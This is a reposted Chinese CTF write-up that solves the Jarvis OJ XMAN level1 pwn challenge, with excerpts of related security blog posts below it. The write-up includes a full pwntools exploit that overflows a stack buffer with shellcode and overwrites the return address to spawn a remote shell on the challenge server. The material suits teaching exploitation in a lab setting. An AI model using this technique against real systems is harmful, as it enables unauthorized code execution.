Jarvis OJ - [XMAN]level1 - Writeup

最新推荐文章于 2023-01-12 18:58:58 发布
最新推荐文章于 2023-01-12 18:58:58 发布
阅读量166 收藏
点赞数
文章标签: shell
原文链接:http://www.cnblogs.com/WangAoBo/p/7594173.html
版权
本文详细解析了JarvisOJ平台上的XMAN level1挑战,通过分析发现该题未开启NX保护机制,利用shellcode填充缓冲区并控制函数返回地址,成功获取shell,最终拿到flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Jarvis OJ - [XMAN]level1 - Writeup

M4x原创,转载请表明出处http://www.cnblogs.com/WangAoBo/p/7594173.html

题目:

分析

  • checksec检查保护机制如下,NX没开,可以通过执行shellcode来get shell

  • 拖到IDA中,查看函数的流程,vulnerable_function函数打印了缓冲区的起始地址,read可以读取0x100个字符,而buf到ret的偏移为0x88 + 0x4 < 0x100,而该elf又是No canary found。

  • 整理一下现有的信息:

    • 长度为0x100的缓冲区
    • 缓冲区的起始地址
    • 没有打开栈保护和NX保护

    因此,可以把shellcode填到以buf为起始地址的缓冲区里,并控制vulnerable_function返回到shellcode,就可以通过执行shellcode拿到shell,如下图

步骤

  • 经过如上分析,写出exp如下:

 1 #!/usr/bin/env python
 2 # -*- coding: utf-8 -*-
 3 __Auther__ = 'M4x'
 4 
 5 from pwn import *
 6 context(log_level = 'debug', arch = 'i386', os = 'linux')
 7 
 8 shellcode = asm(shellcraft.sh())
 9 #  io = process('./level1')
10 io = remote('pwn2.jarvisoj.com', 9877)
11 text = io.recvline()[14: -2]
12 #  print text[14:-2]
13 buf_addr = int(text, 16)
14 
15 payload = shellcode + '\x90' * (0x88 + 0x4 - len(shellcode)) + p32(buf_addr)
16 io.send(payload)
17 io.interactive()
18 io.close()

 

 

运行exp,拿到flag

 

转载于:https://www.cnblogs.com/WangAoBo/p/7594173.html

baikeng3674
关注
Kioptrix_Level_1-writeup
Lee
08-19 709
Kioptrix_Level_1-writeup 0x00 信息收集 目标机器IP 16.16.16.176 kali攻击机 16.16.16.177 //nmap扫描端口服务 nmap -A -Pn 16.16.16.176 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-19 13:43 CST Nmap scan report for 16.16.16.176 Host is up (0.00081s latency). Not
Jarvis OJ Crypto Writeup
NYX的博客
08-09 1214
[xman2019]xcaesar 题目给出了提示,和凯撒密码有关,打开下载完的.py文件观察代码 def caesar_encrypt(m,k): r="" for i in m: r+=chr((ord(i)+k)%128) return r from secret import m,k print caesar_encrypt(m,k).encode("base64") #output:bXNobgJyaHB6aHRwdGgE
Jarvis OJ level1 writeup
PLpa的博客
07-07 754
拿到题目,首先我们检查一下程序的保护: 可以看出来,程序什么保护也没开,既然没开NX保护,说明堆栈上的代码可以执行。 我们打开IDA反汇编一下: 我们看到这里可输入一个buf,并且题目把buf的地址也输出到屏幕上,我们就可以控制buf植入shell code了,再返回调用即可。 ...
[JarvisOj][XMAN]level1
weixin_34088838的博客
07-30 165
都没开。。。 ida分析 发现返回了buf的地址 并没有自带system 或者/bin/sh 所以估计是自己写shellcode 偷个图。。。 #!/usr/bin/env python # -*- coding: utf-8 -*- from pwn import * shellcode = asm(shellcraft.sh(...
PWN利器-pwntools安装、调试教程一览
samli的博客
12-05 9437
pwntools是一个CTF框架和漏洞利用的python开发库,专为快速开发而设计,旨在使漏洞利用编写尽可能简答
python笔记 - 网络编程(十六)
weixin_42295011的博客
07-20 350
python网络编程的简单实现
2022年春秋杯网络安全联赛冬季赛--部分赛题WP
xccwxy的博客
01-12 1159
2022年春秋杯网络安全联赛冬季赛--部分赛题WP
第十四章高级IO函数
qq_32783703的博客
12-20 263
第十四章高级IO函数 14.1 概述 本章我们笼统的归为“高级IO”的各个函数和技术。首先是在IO操作上设置超时,然后是read 和 write 的几个变体:recv和send允许通过第四个参数从进程传递到内核;readv和writev允许指定往其中输入数据或从其中输出数据的缓冲区向量;recvmsg和sendmsg结合了其他IO函数的所有特性,并具备接收和发送辅助数据的新能力。 14.2套...
python格式化字符串总结_格式化字符串总结
weixin_26858217的博客
12-28 427
格式化字符串总结我觉得总结格式化字符串,拿大量的例题不如自己写下payload自动生成,payload又分32位跟64位,不过原理是一样的,不过64位地址有太多的00,printf有00截断,所以要将地址放后面,不能放前面本来还想从头写的,我觉得站在巨人的肩膀上干事更快既然pwntools他的payload不支持64位,我们稍微改动下或许可以让他支持64位的至于堆上和bss上的格式化字符串,就以3...
学习笔记:buuctf pwn题
RookieMOR的博客
06-28 370
如有不对,请指正
CSICTF 部分逆向wp
苗_的博客
07-29 442
RicknMorty 整个看下来逻辑就是,随机出现两个数,找到他们的最小公因数,然后+3求阶乘。(在30s内算完所有即可) (当时没有用脚本,直接计算器走一波就出来了) 附上脚本: from pwn import * from LibcSearcher import * from struct import pack context.os='linux' context.arch='amd64' context.log_level='debug' sd=lambda x:io.send(x) s
linux网络编程之socket(六):利用recv和readn函数实现readline函数
Super的博客
10-22 880
在前面的文章中,我们为了避免粘包问题,实现了一个readn函数读取固定字节的数据。如果应用层协议的各字段长度固定,用readn来读是非常方便的。例如设计一种客户端上传文件的协议,规定前12字节表示文件名,超过12字节的文件名截断,不足12字节的文件名用’\0’补齐,从第13字节开始是文件内容,上传完所有文件内容后关闭连接,服务器可以先调用readn读12个字节,根据文件名创建文件,然后在一个循环中调
socket io流 readLine()方法报错问题
weixin_39910677的博客
07-18 1927
  服务异常如下:Connection reset 网上有很多关于socket通信的教程,很多教程例子中都会用到readLine()这个方法,然后就告诉大家,照着我的例子这么写就OK了。 古人云:尽信书则无书。网上有很多“大牛”从来“不拘小节”,到底是:不知道,还是知不道?你确定你的例子没问题? readLine()这个方法是:按行读取,你读取一个文件流没问题。 但是你用在socket中...
python学习笔记
热门推荐
鸟窝
09-14 7万+
官网http://www.python.org/ 官网library http://docs.python.org/library/ 中文手册,适合快速入门 http://download.youkuaiyun.com/detail/xiarendeniao/4236870 python cook book中文版 http://download.youkuaiyun.com/detail/XIAREND
pwn三连
qq_43613144的博客
07-24 386
‘’
接上一篇的pwn题,exp解析及pwntools相关使用。
qq_43474199的博客
09-26 1402
from pwn import * from LibcSearcher import * context(log_level='debug') #offset=32 sh=process('./pwn1.bak') elf=ELF('./pwn1.bak') #gdb.attach(sh,'b *0x400e9d') sh.recvuntil("choice:") sh.sendline('1'...
Linux—IO函数的例子(send/recv)
木辛木又
06-16 757
send() 函数用于收发数据,原型如下: #include<sys/types.h> #include<sys/socket.h> ssize_t send(int s,const void* buf,size_t len,int flag); 将缓冲区buf中大小为len的数据,通过套接字文件描述符按照flag指定的方式发送出去。返回值为成功发送的字节数。 recv() 函数用于接收数据,原型如下: #include<sys/types.h> #include&lt
c语言格式化字符漏洞,格式化字符串漏洞题目练习
weixin_30111277的博客
05-22 971
整合一下最近做的格式化字符串题目的练习,把wp给写一下,方便对总结对这个漏洞的利用套路和技巧。inndy_echo保护和arch[*] '/media/psf/mypwn2/buuctf/inndy_echo/echo'Arch: i386-32-littleRELRO: Partial RELROStack: No canary foundNX: NX enabl...
(Jarvis Oj)(Pwn) level1
Nothing
04-18 1344
(Jarvis Oj)(Pwn) level1 首先用checksec查一下保护。几乎没开什么保护措施。关键的是NX没开,意味着栈上的数据可执行。 用ida反汇编,找到溢出点。 但这次没有找到system函数了,那么该怎么得到shell呢,发现这个函数调用了printf函数,输出了buf的地址,在结合NX保护是关闭的,那么就意味着,如果将shellcode写到buf中,函数返回时跳转...
jarvisoj_level1
最新发布
08-28
- *1* *3* [[BUUCTF-pwn]——jarvisoj_level1](https://blog.youkuaiyun.com/Y_peak/article/details/114916604)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值